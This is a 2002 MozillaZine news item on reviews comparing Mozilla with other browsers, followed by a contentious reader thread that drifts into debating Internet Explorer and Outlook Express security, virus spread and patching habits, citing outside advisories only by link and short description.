MozillaZine

Comparatively Speaking...

Monday July 1st, 2002

Linux Online recently compared the major Linux browsers, including the Mozilla-based trio of Mozilla 1.0, Netscape 6.2 and Galeon. Reviewer Michael J Jordan praises Mozilla's stability, tabbed browsing, rendering and customisation.

As mentioned by fondacio on our forums, the International Herald and Tribune took a look at Mozilla, Opera and NeoPlanet (note that the site doesn't seem to work in some builds of Mozilla). Reviewer Lee Dembart says that "Mozilla is impressive and has it all over Opera." He especially likes the ability to block pop-ups, tabbed browsing and pipelining.

UPDATE! tuxracer writes: "I've put up a browser comparison list, comparing various features that affect usability and W3C standards compliance. It compares Mozilla 1.0, Netcaptor 7.01, Internet Explorer 6.0 (Windows), and Internet Explorer 5.x (Mac)."


#1 IHT problem is not with Mozilla builds

by fondacio

Tuesday July 2nd, 2002 4:33 AM

Reply to this message

The International Herald Tribune site has not been working correctly since the last site update, but the problem is not with Mozilla. The text of the articles doesn't show in IE either. I hope they fix it soon. By the way, the javascipt menus on the site have been way faster on Mozilla than IE on my machine (PII-500) forever.

#3 Re: IHT problem is not with Mozilla builds

by AlexBishop <alex@mozillazine.org>

Tuesday July 2nd, 2002 8:47 AM

Reply to this message

"The International Herald Tribune site has not been working correctly since the last site update, but the problem is not with Mozilla. The text of the articles doesn't show in IE either."

Hmm. The article doesn't display correctly for me using Mozilla 1.1 Alpha but it does work with IE6, Netscape 6.2 and Netscape Communicator 4.7 (but the page presented to Communicator is completely different to the others). This would suggest bad browser-sniffing but I've heard that the page does display correctly in Mozilla 1.0 (though I haven't tested this myself). I'll do some further investigating.

Alex

#4 Mozilla trunk -> looks ok

by TheK <kl@3dots.de>

Tuesday July 2nd, 2002 8:51 AM

Reply to this message

what are you all missing?

#5 Oops... the problem was caused by WebWasher

by fondacio

Tuesday July 2nd, 2002 9:04 AM

Reply to this message

The problem was that the actual text of the articles didn't show up anymore. As it turns out, the problem was neither with Mozilla nor with the IHT site. Yesterday I installed the most recent beta of WebWasher (<http://www.webwasher.com>), which enables you to always allow right mouse clicks. Unchecking this option solved the problem, both in Moz en IE. Guess I should have checked more thoroughly (not to mention that WebWasher is a bit redundant with the imageblocker and script features in Mozilla :-).

"the page presented to Communicator is completely different to the others"

So is the page presented to Opera. If you change Opera's user agent string, you get the same version that is presented to IE, Mozilla and Netscape 6+. However, it doesn't work correctly. I don't know if the site would work with Communicator (probably not), but I think they found an elegant solution to have both a modern site and still be able to present their content to users with older browsers. Incidentally, iht.com presented some problems between 0.9.5 and 0.9.9, crashing Mozilla immediately and disabling the back and forward buttons. Those bugs (88684 and 105619) were fixed some time ago.

#6 try a new profile

by morg

Tuesday July 2nd, 2002 11:12 AM

Reply to this message

I was having the same trouble seeing IHT pages recently. I fixed it by using a new profile.

It's pretty cool that IHT would run a nice, friendly story about Mozilla. Earlier this year, the developers fixed a JavaScript bug that was crashing Mozilla every time the browser went to their site. That fix also got the site's sliding menu bar working on Mozilla, IIRC. Since then, it's been fine.

#2 Perofrmance...

by TheK <kl@3dots.de>

Tuesday July 2nd, 2002 8:43 AM

Reply to this message

as the Linux Online article says, the only downside on Mozilla is bad performance.

#7 tuxracer's comparison

by jhatax <manoj_r_mehta@yahoo.co.uk>

Wednesday July 3rd, 2002 4:44 PM

Reply to this message

tuxracer's comparison of browser out of the box features is biased towards Mozilla. Though I am a big fan of Mozilla, I also believe in giving credit where it is due. IE has the following features over Moz:

1. Automatic form data capture. This is very intuitive and makes my life very easy when I do repititive form filling 2. Guaranteed single form submission (Mozilla submits forms twice sometimes. There are open bugs on this issue!) 3. Some Performance issues still exist in Mozilla as regards DHTML and pages with large tables/data

Fact of the matter is, Mozilla on Windows might be the browser I use most, but I more or less expect IE to sometimes do what Mozilla can't.

#14 Re: tuxracer's comparison

by tuxracer

Thursday July 4th, 2002 2:29 PM

Reply to this message

"1. Automatic form data capture. This is very intuitive and makes my life very easy when I do repititive form filling"

I will add this.

"2. Guaranteed single form submission (Mozilla submits forms twice sometimes. There are open bugs on this issue!)"

I've never experienced this issue before.

"3. Some Performance issues still exist in Mozilla as regards DHTML and pages with large tables/data"

This is too vague. I'm not going to put generalized things such as "Good proformance: Mozilla: No, IE: Yes" or "Better Interface: MOzilla: Yes, IE: No". Anything that isn't very specific is just bias, one way or the other.

I also think you are extremely exagerating, and being too quick to judge to call the entire list bias towards Mozilla because I will not list things that I have not experienced for myself, and that are extremely vague (e.g. "Good performance", "Better Inteface", "Cooler", etc...). I feel it is very ignorant to dismiss the entire list, and label it as "bias", over the three, supposed, issues you've mentioned.

#63 Re: Re: tuxracer's comparison

by TheK <kl@3dots.de>

Sunday July 7th, 2002 10:21 AM

Reply to this message

the Form-Submission-Problems seams to have gone, at least I haven't seen it for long.

#8 Got that right!

by kristen

Wednesday July 3rd, 2002 6:14 PM

Reply to this message

"tuxracer's comparison of browser out of the box features is biased towards Mozilla."

It most certainly is. Speed, stability, and memory consumption have been conveniently dismissed. No mention of Opera or the freeware clone of NetCaptor called 'Crazy Browser'. More importantly a good one called 'MyIE' made by someone in China called Changyou. Supports complete popup killing, tabs, bookmark groups, url shortcuts, url aliases, translation (configurable), url/ad blocking (configurable), customizable toolbars, etc, etc.. and weighs in at only 380K or so. Completely free, extremely fast, and uses IE for the rendering engine. No transparent PNG's? No biggy for it is coming soon (and plenty more) with IE7.

#9 Re: Got that right!

by eiseli

Wednesday July 3rd, 2002 8:04 PM

Reply to this message

"Speed, stability, and memory consumption have been conveniently dismissed."

Hum... Do you call this "feature"? I call this performance. You can have a piece of software with tons of features and very bad performance, almost no features and good performance, and everything in between. So if tuxracer decided to compare the features, let him do this. If you want to compare performance, then please do so.

About the CrazyBrowser, MyIE and so on, I wonder if these are not so-called "ad-ons". We might as well compare "Mozilla with Multizilla", "Mozilla with Optimoz", "Mozilla with..."

Anyway, I think a list of all possible features comparing to Mozilla is very important so that we can see where there is still some work to do. Let's hope people e-mail tuxracer and tell him: "I'm using browser xy and I love its feature yz", and it would be great if he added this into his list.

#10 Re: Re: Got that right!

by kristen

Wednesday July 3rd, 2002 8:36 PM

Reply to this message

"Hum... Do you call this "feature"?"

I sure do. Although, expectation may be a better term.

"I wonder if these are not so-called "ad- ons""

Nope. They are complete user-interfaces that incorporate IE for displaying web content. Of course, that doesn't stop one from calling a user interface an 'add-on' if they so desire to. Several of the items listed in the comparison are strictly UI 'centric', i.e., tabs, sidebar, etc.

"I think a list of all possible features comparing to Mozilla is very important"

Agreed! ;)

#12 Re: Re: Got that right!

by kristen

Wednesday July 3rd, 2002 11:33 PM

Reply to this message

"then you should also include at least some of the of the Mozilla derivatives and Gecko-based browsers, take your pick from [takes a deep breath]: m/b, Chimera, NS6, NS7, Beonex, Galeon, K-Meleon, Aphrodite, BrowserG!"

hehe. Be my guest! ;)

#11 Got that wrong..

by michaelg <mike@vee.net>

Wednesday July 3rd, 2002 11:13 PM

Reply to this message

"Speed, stability, and memory consumption have been conveniently dismissed."

Becuase it's a non-issue? Moz is sometimes faster, sometimes slower than IE. I've found it to be more stable than IE, as do a lot of people I know, but others will sware differently. And when you can give me an balanced way to make a comparison between the memory consumption of the two, let me know.

The problem with putting a comparison up between these sorts of attributes (they're not "features") up is that they will always depend on the test system's configuration, hence is it impossible to get a comparison which is 100% fair and accurate.

"No mention of Opera or the freeware clone of NetCaptor called 'Crazy Browser'. More importantly a good one called 'MyIE' [...]"

Excluding Opera was a no-no, as was including NetCaptor. Crazy Browser and MyIE should not have been included becuse the comparison was mostly between non-derivative browsers.

But if you're going to include NetCaptor, Crazy Browser and MyIE, then you should also include at least some of the of the Mozilla derivatives and Gecko-based browsers, take your pick from [takes a deep breath]: m/b, Chimera, NS6, NS7, Beonex, Galeon, K-Meleon, Aphrodite, BrowserG! and probably a few more as well.

"No biggy for it is coming soon (and plenty more) with IE7."

[flame-on] Ohhh! Goodie! Is that the one the're including DRM? So you can't download the same HTML page twice without paying for it (twice!)? Are they going to put even *more* security holes in it? Find new, exciting ways to balkanize the Web and the Internet? Joy! Anyway, given how much slower IE6 is compared to IE5, I just /can't wait/ for 7. [flame-off]

/mike.

#13 Re: Got that wrong..

by kristen

Wednesday July 3rd, 2002 11:36 PM

Reply to this message

"then you should also include at least some of the of the Mozilla derivatives and Gecko-based browsers, take your pick from [takes a deep breath]: m/b, Chimera, NS6, NS7, Beonex, Galeon, K-Meleon, Aphrodite, BrowserG!"

hehe. Be my guest! ;)

#26 Re: Got that wrong..

by michaelg <mike@vee.net>

Friday July 5th, 2002 8:08 PM

Reply to this message

"hehe. Be my guest! ;)"

Too bad I haven't got a Windoze box or a Mac.. :)

/mike

#15 Re: tuxracer's comparison

by tuxracer

Thursday July 4th, 2002 2:36 PM

Reply to this message

"It most certainly is. Speed, stability, and memory consumption have been conveniently dismissed."

I am not going to list things as vague as that. "Fast: Mozilla: Yes, IE: No" for example. or "Stable: Mozilla: Yes, IE: No". It is too vague, and bias no matter which is choosen. Memory consumption cannot be accurately mesured with Internet Explorer due to intergration with the operating system, with a mac it could be done, I would need someone to tell me how much memory it uses on the mac.

"No mention of Opera or the freeware clone of NetCaptor called 'Crazy Browser'. More importantly a good one called 'MyIE' made by someone in China called Changyou..."

I'm sorry, but I'm not going to sit here all day and compare every single browser in existance. IE is the most popular browser, and Netcaptor appears to be the most popular alternate interface for IE. If I'm mistaken, well then I'm sorry.

"No transparent PNG's? No biggy for it is coming soon (and plenty more) with IE7."

I'm not going to list features which are coming, or might be coming, in the next version of the browsers. I list what is currently available in the versions mentioned.

#18 Re: Got that right!

by arielb

Friday July 5th, 2002 1:52 AM

Reply to this message

is better security also coming soon in IE7? It sure is annoying having to download security updates all the time (especially since Windows update still doesn't support pause/resume)

#19 Re: Re: Got that right!

by kristen

Friday July 5th, 2002 3:05 AM

Reply to this message

"is better security also coming soon in IE7?"

I'm sure it will be even better.

"It sure is annoying having to download security updates all the time"

Then don't. What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck.

Lot's of false info out there on the wild wild web (www).

#20 Lots of false info??

by niner

Friday July 5th, 2002 8:01 AM

Reply to this message

Yeah if there were even half as many car accidents on LANParties like Nimda infections (via IE) there would be no more LANs just because all players died. How can you explain this if security holes are no problem?

#21 Re: Re: Re: Got that right!

by asa <asa@mozilla.org>

Friday July 5th, 2002 1:45 PM

Reply to this message

Kristin, care to point us to a credible source for that claim? Are you counting virus infections as being compromised?

Even if your numbers are anything resembling reality that doesn't change the basic issue that while the risk may be low the consequences are very, very high. It also doesn't change the fact that there are fairly easy ways to dramatically reduce the chances that you will face those extreme consequences and failing to take those easy steps is both irresponsible and ultimately self-destructive.

Let's use your car wreck analogy. There were about 42,000 deaths in car wrecks last year <http://www.hwysafety.org/…_facts/state_by_state.pdf> and more than three million injuries <http://www-nrd.nhtsa.dot.…CSA/Content/Assess2K.html> . That's about 1 in 4000 drivers killed each year and about 1 in 55 injured. More than 40% of the deaths were the result of an alcohol related accident <http://www-nrd.nhtsa.dot.…pt/Alc00Chap2.htm#_VPID_8> . Doing something as simple as removing alcohol could prevent nearly 17,000 deaths and nearly one million injuries every year. Additionally, people not wearing seatbelts fair much worse in automobile accidents than those who do wear a restraint <http://www-nrd.nhtsa.dot.…CSA/Content/Assess2K.html> . "NHTSA research has shown that driver or a passenger cuts his or her risk of dying in a crash almost in half by buckling up" <http://www-nrd.nhtsa.dot.…CSA/Content/Assess2K.html> . So doing these two simple things, avoiding drunk driving and wearing a seatbelt, you can dramatically reduce the chances that you'll be killed or injured. With consequences that extreme I think it's a good idea to take the extra steps of not drinking and buclking up. So do the federal, state, and local governments.

While it's not death, having your personal, credit, banking, ert. data stolen or having your computer compromised by virii are grave consequences even if the chances of being victimized are slim. There are a couple of simple things that you can do to dramatically reduce your risk to these consequences. You can avoid insecure software like IE and Outlook and you can encrypt and otherwise secure as much of your data as possible. Doing these things are likely to have a dramatic effect in lowering your overall liklihood of being a victim <http://www.sophos.com/virusinfo/topten/> <http://jscript.dk/unpatched/> and do not require serious inconvenience (I'd argue that they are worth it even if they do cause serious inconvenience. Taking a taxi home or dealing with an uncomforatable seatbelt can be very inconvenient but most people recognize that they are worth it).

Telling people that they shouldn't download security updates because of the the low probability of their being attacked, compromised or exploited is irresponsible. It's not that different from telling folks that driving drunk and not wearing a seatbelt is OK because the change that it will cause death is not very high.

--Asa

#24 Re: Re: Re: Re: Got that right!

by kristen

Friday July 5th, 2002 6:24 PM

Reply to this message

"Are you counting virus infections as being compromised?"

I'm glad you brought that up. You mean like Melissa, ILOVEYOU, W32.Klez and such? The ones that people in the forums here and mozilla newsgroups love to bring up to bash OE?

Those were rhetorical questions, of course. What you won't hear from these people is that those 'viruses' required people to execute an attachment in order to wreak havoc. Some were designed specifically to target OE users by using VBScript (a language only supported by IE/OE). Those attachments could just have easily been an executable (rather than an OS specific scripting language) that scanned, lets say, an NS4 users address book and then proceeded to send itself to all of the NS4 users 'buddies'. The attachment could even be more effective by including its own SMTP engine (such as W32.Klez) to bypass the users email client all together. If something requires a user to execute it in order to wreak havoc then game over. It is no longer a fault of any given operating system, email client, web browser, etc. Especially if the user in question has administrator level rights such as in WinNT/2K/XP, Linux, etc.

You, of course, won't hear that from the 'of the people, by the people, for the people' Mozilla crew. It is sad to see these kinds of things targeted at Windows users. It makes me wonder who the people are that are making these things, where they come from, and what operating system, web browser, etc. they spend their life evangelizing.

"Telling people that they shouldn't download security updates because of the the low probability of their being attacked, compromised or exploited is irresponsible."

Agreed. I don't normally suggest to people that they don't download updates, however, arielb seemed to be irritated by having to download security updates for IE so I gave him/her some food for thought. I assert that arielb could install the original Windows98 with an entirely unpatched IE4 and browse to his/hers hearts content without being 'compromised' in the least.

One thing that you could do, or anyone else here for that matter, is to take a break from the IE/OE/Windows security ranting and provide arielb some worthwhile links that he/she should not visit (including all of us 'in the dark' folks), lest they compromise his/her computer and severely degrade his/hers way of life.

Of the people, by the people, for the people. Do you know what the amazing thing is? I'm sure that most of the regulars here don't even know what I'm talking about.

#27 Re: Re: Re: Re: Re: Got that right!

by asa <asa@mozilla.org>

Friday July 5th, 2002 9:58 PM

Reply to this message

"those 'viruses' required people to execute an attachment in order to wreak havoc. Some were designed specifically to target OE users by using VBScript (a language only supported by IE/OE). Those attachments could just have easily been an executable (rather than an OS specific scripting language) "

But they weren't, were they? And I think you're confused. There have been and are Outlook virii which reqire only that the user open the message. Some did require executing and Outlook does everything it can to make that easy for a user to do. The point still remains that if you use that software you are going to be subject to that attack and if you don't use that software you won't be subject to that attack. The point is that Mozilla and other applications _are_not_ the target that Outlook is. Same goes for IE.

"It makes me wonder who the people are that are making these things, where they come from, and what operating system, web browser, etc. they spend their life evangelizing. "

If you really wonder why these attacks are targeted at windows then I'll help you out. Microsoft makes it easy. Targeting MS apps and OS is much easier than targeting Mac or Unix apps and operating systems. It's not a a difficult concept. If I leave my door unlocked I am more likely to be burgled than if I don't. Microsoft has left the doors unlocked.

"I assert that arielb could install the original Windows98 with an entirely unpatched IE4 and browse to his/hers hearts content without being 'compromised' in the least. "

Feel free to assert all you want but the truth is that the less secure you are the more likely you are to be compromised. You've got a 50% greater liklihood of dying in a car crash if you don't wear a seatbelt. It's not that complex a concept.

"take a break from the IE/OE/Windows security ranting and provide arielb some worthwhile links that he/she should not visit"

The two are orthogonal and I'd argue that arielb should feel safe reading any mail that arrives in the inbox and should feel free and safe to surf to any URL on the Web without worry that user data could be easily compromised. With Mozilla arielb _is_ safer reading any mail that arrives in the inbox and is safer surfing even malicious websites. That's the result of Mozilla's better security and privacy as well as the fact that Mozilla isn't the target that IE and Outlook are (both because it is a more difficult target and a less desirable target because of a smaller userbase).

On more thing, and if you respond at all please respond to at least this question. Why are you reading and posting at mozillaZine and can you explain how your comments fit in to this website's overarching topic, "Mozilla News and Advocacy"? Are you a Mozilla advocate? Are you providing Mozilla news?

--Asa

#28 Re: Re: Re: Re: Re: Re: Got that right!

by kristen

Friday July 5th, 2002 11:33 PM

Reply to this message

"Feel free to assert all you want"

Thanks, I will. ;)

"The point is that Mozilla and other applications _are_not_ the target that Outlook is. Same goes for IE."

Of course not. If I wanted to do damage, wreak havoc, and cause problems with the highest degree of success, I certainly wouldn't bother making a program that read address book info from the latest mozilla nightly build. I'd make something that goes with what's the most popular and widespread at the time.

"With Mozilla arielb _is_ safer reading any mail that arrives in the inbox and is safer surfing even malicious websites."

How is that I wonder? In OE I can have scripting and attachments completely disabled. How exactly does Mozilla surpass this?

"That's the result of Mozilla's better security and privacy as well as the fact that Mozilla isn't the target that IE and Outlook are (both because it is a more difficult target and a less desirable target because of a smaller userbase)."

Small user base being the keyword. Like I said earlier, the email 'viri' that are so frequently brought up could just have easily been an *.exe file that a mozilla user could have chosen to execute. You're in quite a catch22 there: Too small for hackers to care about, yet at the same time evangelizing.

"On more thing, and if you respond at all please respond to at least this question. Why are you reading and posting at mozillaZine and can you explain how your comments fit in to this website's overarching topic, "Mozilla News and Advocacy"? Are you a Mozilla advocate? Are you providing Mozilla news?"

Hmmm. Earlier you told me to feel free to assert all I want. I must have misread that.

To answer your first question as to why I am reading and posting at Mozillazine, the answer is simple: Because I can. If this a no-no then maybe a security upgrade is in order. ;)

Am I a Mozilla advocate? I'm not quite sure what you mean there. Do I have it installed on my own computer? Yes. Is it my primary browser? No. Do I preach it to other people? No.

Am I providing Mozilla news? Kinda. A different and practical point of view is more like it. If you're seeking to have a small community of people that hang around and agree with each other all day long then I suggest you do follow up with the earlier suggestion and get that 'Blind Mozilla Faith Only' security patch applied. ;)

Still waiting for those links. ;)

#42 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 10:11 AM

Reply to this message

"How is that I wonder? In OE I can have scripting and attachments completely disabled."

Makes no difference:

<http://www.malware.com/lookout.html> 'Silent delivery and installation of an executable on a target computer. No client input other than opening an email or newsgroup post or web site.' No attachments need to be opened, you simply need to read the e-mail or visit the website.

<http://sec.greymagic.com/adv/gm002-ie/> 'Automatically opening IE + Executing attachments'

And if you've installed OfficeXP you're vulnerable to <http://sec.greymagic.com/adv/gm005-ie/> 'Running script even with Scripting Disabled'

All the exploits mentioned above have no patch.

#44 Re: Re: tuxracer's comparison

by kristen

Saturday July 6th, 2002 10:46 AM

Reply to this message

"Makes no difference:"

Sure it does.

1. (LINK) 'Silent delivery and installation of an executable on a target computer. Scripting Required.

2. (LINK) 'Automatically opening IE + Executing attachments'. Scripting Required.

3. And if you've installed OfficeXP you're vulnerable to (LINK). Don't have that but ActiveX must be enabled.

"All the exploits mentioned above have no patch."

They do. OE6 is set by default to run in the restricted zone. The restricted zone is set by default to disabled scripting and disabled activex.

#50 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 7:47 PM

Reply to this message

"They do. OE6 is set by default to run in the restricted zone. The restricted zone is set by default to disabled scripting and disabled activex."

Uhm, actually no. It makes no difference at all, if you actually look at the <http://www.malware.com/lookout.html> you will see:

"Silent delivery and installation of an executable on a target computer. No client input other than opening an email or newsgroup post or web site. This can be accomplished with the default installation of...Outlook Express 6.0 and probably Outlook and Outlook 2002 and whatever other Outlook's there are. Default settings for Outlook Express and Outlook: restricted zone."

"In the case of Outlook Express default settings and Outlook default settings, where no scripting and no activex is allowed. We can achieve similar results substituting our method of file transference in the above, with a less than robust method. Simply put..."

No activex is required. No scripting is required. Works in Restricted zone.

Like I said, makes no difference at all. And I don't know about you, but I don't want to be at the mercy of every e-mail I read. But that's just me. Each to their own I guess.

#32 Follow up

by kristen

Saturday July 6th, 2002 5:21 AM

Reply to this message

"Why are you reading and posting at mozillaZine and can you explain how your comments fit in to this website's overarching topic, "Mozilla News and Advocacy"? Are you a Mozilla advocate? Are you providing Mozilla news?"

I took the liberty to file a bug on this:

<http://bugzilla.mozilla.org/show_bug.cgi?id=156006>

#34 Re: Follow up

by bandido

Saturday July 6th, 2002 7:06 AM

Reply to this message

What you have done is very childish and irresponsible. Why are you using bugzilla to report bogus bugs? Please, in the future, use bugzilla in a way that is productive and constructive. If you want to rant, use the mozilla public general newsgroups.

#35 Someone is having issues here

by fondacio

Saturday July 6th, 2002 7:11 AM

Reply to this message

Even though I would agree that sometimes people in these forums tend to react in an oversensitive way to critical or even negative statements about Mozilla that do contain valid points, I think it is clear that someone has some serious issues here.

Kristen, it would help if you would make well-argued and clearly formulated points. It would also help if while you're doing this, you make a valid distinction between issues related to Mozilla and issues regarding Mozillazine and not waste your own and other people's time by filing obviously invalid bugs in Bugzilla. Right now, it just seems you have an issue with people who advocate Mozilla. It's no surprise that you can find those people here. But instead of giving them something to think about, you just behave like an adolescent who thinks it's fun to try and provoke and annoy others. I have been missing people like strauss and macpeep in these forums, but unfortunately you're not like them.

#37 Re: Someone is having issues here

by kristen

Saturday July 6th, 2002 9:43 AM

Reply to this message

I'll respond to both of you at the same time since your replies are too lame (sorry, but it's true) to warrant individual responses.

"Why are you using bugzilla to report bogus bugs?" " and not waste your own and other people's time by filing obviously invalid bugs in Bugzilla."

You mean 'invalid bugs' like a bug filed complaining about a pop machine not working? Or how person A owes person B some money? Or of the several other non-bug related submissions to bugzilla most of which were made by @<mozilla.org/@netscape.com> people? Let me guess, in addition to reading and posting at mozillazine, a 'mozilla advocacy' badge is required for this also. If that's the case then the irony is that the bug I filed is, indeed, entirely valid. ;)

"Right now, it just seems you have an issue with people who advocate Mozilla"

That's funny. I was just thinking the exact opposite. It seems to me that some people have problems with those who don't advocate mozilla.

"But instead of giving them something to think about, you just behave like an adolescent who thinks it's fun to try and provoke and annoy others."

Hmmm. I don't think so. You may want to take a fresh read through this thread. ;)

#36 Well Well Well

by cartman <dawson3k@myrealbox.com>

Saturday July 6th, 2002 9:30 AM

Reply to this message

Ohh dear Look at the news From <http://jscript.dk/unpatched/>

7 June 2002: There are currently 18 unpatched vulnerabilities.

This is what I call trustful computing ! I think M$ wait for to bug number to come to #20 so that they can put up a cumulative patch online ! LMAO!

#30 Re: Re: Re: Re: Re: Got that right!

by Dobbins

Saturday July 6th, 2002 3:03 AM

Reply to this message

"Those were rhetorical questions, of course. What you won't hear from these people is that those 'viruses' required people to execute an attachment in order to wreak havoc. Some were designed specifically to target OE users by using VBScript (a language only supported by IE/OE). Those attachments could just have easily been an executable (rather than an OS specific scripting language) that scanned, lets say, an NS4 users address book and then proceeded to send itself to all of the NS4 users 'buddies'."

If the Virus was an exe or com file rather than a VirusBasic file most Windows users would remain clueless about it's nature because Microsoft's default setting is to hide file extensions making it easy for a Windows Virus writter to include a "checkout this picture" message in the message that goes with the attached Windows Virus. This is a known security flaw, yet MS still hides the extensions by default in XP.

"If something requires a user to execute it in order to wreak havoc then game over. It is no longer a fault of any given operating system, email client, web browser, etc. Especially if the user in question has administrator level rights such as in WinNT/2K/XP, Linux, etc. "

First, 'nix has a habit of warning it's users about the dangers of using the root account for anything except routine maintance. For example if you use Gnome you get a popup warning that you are accessing it as root and that you can damage the system in this mode. One of Linux's IRC clients actulayy has a popup telling you that you are accessing IRC as root and that it's "stupid" to do this.

You failed to mention Windows 9.x where EVERY user has admin access making ALL 9.x boxes a security hazzard. Another example of MS's slipshod approach to system security. The real problem is MS just dosen't get security, the concept is alien to the company, (and it seems to many of it's users).

Most of the Viruses and security exploits use KNOWN holes in Microsoft Programs. The ease of writting Office Viruses has been well known for years. Nothing was done to plug these holes, not a patch for older versions, and the problems remain in Office XP. Outlook is part of Office and Shares all of the Office flaws. IE has several new exploits crop up each month, yet MS refuses to even consider looking at it's security model. IIS has one hole after another discovered

Microsoft Exploits remain open for months after they are discovered and announced to the public. Security patches have undone earlier patches reopening old holes, or failing to correct a problem giving MS Users a false sense of security.

Sorry, using MS products is like driving around in a Pinto with Firestone tires and no seatbelts. You might drive for years without an accident, ignoring the hundreds of burned out Pintos littering the sides of the roads and on the news reports, but it sure as hell isn't as safe as junking the Pinto and getting a car with some safety features built into it.

#31 Re: Re: Re: Re: Re: Re: Got that right!

by kristen

Saturday July 6th, 2002 5:18 AM

Reply to this message

"If the Virus was an exe or com file rather than a VirusBasic file most Windows users would remain clueless about it's nature because Microsoft's default setting is to hide file extensions making it easy for a Windows Virus writter to include a "checkout this picture" message in the message that goes with the attached Windows Virus. This is a known security flaw, yet MS still hides the extensions by default in XP."

I have absolutely no clue as to what you were trying to say there.

"First, 'nix has a habit of warning it's users about the dangers of using the root account for anything except routine maintance."

Of course. Your point being? A non-root user doesn't have an addressbook? Or a non-root user doesn't have information that is valuable to him/her that could be exploited by malicious code if the user ran such code in their own user process?

"You failed to mention Windows 9.x where EVERY user has admin access making ALL 9.x boxes a security hazzard."

Oh please. You failed to mention older versions of Sendmail and Apache, too. And a whole slew of others. ;)

Bottom line is that most of this security talk is a bunch of hogwash. A lame FUD tactic really and nothing more. If not for me, then for at least others (especially regular mozilla users who have to use IE from time to time for whatever reason): Provide us with a list of malicious sites that we should avoid going to. Given all of the constant and relentless bashes I have read regarding IE's security in the past couple of weeks here and in the mozilla/netscape newsgroups, it should be quite easy.

Of the people, by the people, for the people, remember? In otherwords, put your money where your mouth is. With a little bit of luck you can make a web page that will take control of my PC and send all of my quicken data to you. ;)

#41 Re: Re: Re: Re: Re: Re: Re: Got that right!

by Dobbins

Saturday July 6th, 2002 10:10 AM

Reply to this message

"I have absolutely no clue as to what you were trying to say there."

Windows is capable of showing that that file someone sent you is named "picture.vbs" rather than simply showing a file named "picture" in you outlook window. By default showing the extension is turned off making it more likely someone will click on it. You can warn people not to click on .vbs or .exe or .com but since Windows hides the extensions in the default settings they don't know they are clicking on the type of file you warned them about. MS knows the default settings cause this problem, but they consider Windows users to be dummies that would be confused by seeing extensions.

"Of course. Your point being? A non-root user doesn't have an addressbook? Or a non-root user doesn't have information that is valuable to him/her that could be exploited by malicious code if the user ran such code in their own user process?"

A Regular user is incapable of running a file that will damage the entire system. A file he runs can't change the files that are the equlivant of Windows regestry. It can't Format the Hard drive. It can't delete or modify files belonging to other users. All he can do is run a file that will expose the data in his home directory to exploit, NOT the entire system.

"Oh please. You failed to mention older versions of Sendmail and Apache, too. And a whole slew of others. ;)"

The only security flaw in Apache in years was patched in a matter of a couple of days. IIS flaws remain unpatched months after discovery. Sendmail is patched in a matter of days if not hours when a flaw is discoverd while Microsoft's mail program has holes remaining open for months. Really savy 'nix admins can use Qmail, which has NEVER had a security exploit, instead of Sendmail. Microsoft users don't have the option of choice. If the maintainers of Apachee and Sendmail was as slow as Microsoft is in patching thier programs I can take the source code and either fix it myself or pay some one to fix it, an option that dosen't exist with Microsoft's closed source products. Microsoft users can only wait hoping that MS will get around to fixing the flaw, and that if they do bother fixing it it will be released as a patch rather than as part of the next version requiring upgrade fees.

As for your list strawman, there is no list of sites waiting to exploit your system, just like there isn't a list of burglers that live near you. The absense of a list dosen't mean there are no malicious sites or no burglers in your area. The Security model is to assume that there are sites and burglers that will take advantage of you if you fail to take the proper precautions.

"especially regular mozilla users who have to use IE from time to time for whatever reason"

IE dosen't run on my system for two reasons. 1. It dosen't work on Linux 2. Even if it did I don't install software with 18 known security problems on my system.

Windows users can do the same thing I do, simply not use IE. Much to Microsoft's dismay it is still possible to surf the web without using their software.

#49 Re: Re: Re: Re: Re: Re: Re: Re: Got that right!

by kristen

Saturday July 6th, 2002 7:45 PM

Reply to this message

"By default showing the extension is turned off making it more likely someone will click on it."

I don't think so. I'll tell you what makes it likely that a user will execute an attachment: My dad receiving an email from me with an attachment named "iloveyou.exe" that reads: I love you. ;)

"A Regular user is incapable of running a file that will damage the entire system"

No kidding. Is this your response to: "Especially if the user in question has administrator level rights such as in WinNT/2K/XP, Linux, etc." Because whatever point you're trying to make seems kind of futile.

"As for your list strawman"

Ok. I'll add that to the list of troll, juvenile, irresponsible, yaddah, yaddah, yaddah. Now I am a strawman. ;)

"The absense of a list dosen't mean there are no malicious sites or no burglers in your area"

Here's a novel concept: The absence of a list certainly doesn't mean there is either. In your evangelizing of a product, browsing security is repeatedly, in untold degrees, brought up. I'm simply saying can you show me what you mean? Can you provide me with, at least, a few sites that exploit these obscure security holes reported by microsoft, gray magic, or whoever else?

Like I said to arielb, the chances that he/she comes across a web page that violates his/her security is less than getting killed in a car wreck several times over. This may come as a blow to some but oh well. ;)

#51 Re: Re: Re: Re: Re: Re: Re: Re: Re: Got that right

by Dobbins

Saturday July 6th, 2002 8:34 PM

Reply to this message

Fine Kristen, Live in your fantasy world where Uncle Bill will take care of your every computing need, ignore all the Microsoft Viruses, the tardy response (if any) to security flaws. It's allwaya amusing to watch microsefs make fools of themselves.

#62 Re: Re: Re: Re: Re: Re: Re: Re: Re: Got that right

by SubtleRebel <mark@ky.net>

Sunday July 7th, 2002 10:08 AM

Reply to this message

> "As for your list strawman" > > Ok. I'll add that to the list of troll, juvenile, irresponsible, > yaddah, yaddah, yaddah. Now I am a strawman. ;)

No one called you a strawman. Apparently you are not familiar with the term; perhaps you should look it up.

If you do understand the term, then your response does qualify you as a troll.

#40 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 10:01 AM

Reply to this message

"Those were rhetorical questions, of course. What you won't hear from these people is that those 'viruses' required people to execute an attachment in order to wreak havoc. Some were designed specifically to target OE users by using VBScript (a language only supported by IE/OE). Those attachments could just have easily been an executable (rather than an OS specific scripting language) that scanned, lets say, an NS4 users address book and then proceeded to send itself to all of the NS4 users 'buddies'. The attachment could even be more effective by including its own SMTP engine (such as W32.Klez) to bypass the users email client all together. If something requires a user to execute it in order to wreak havoc then game over. It is no longer a fault of any given operating system, email client, web browser, etc. Especially if the user in question has administrator level rights such as in WinNT/2K/XP, Linux, etc."

I would like to take this time to point you to one of the many unpatched IE/OE exploits: <http://www.malware.com/lookout.html>

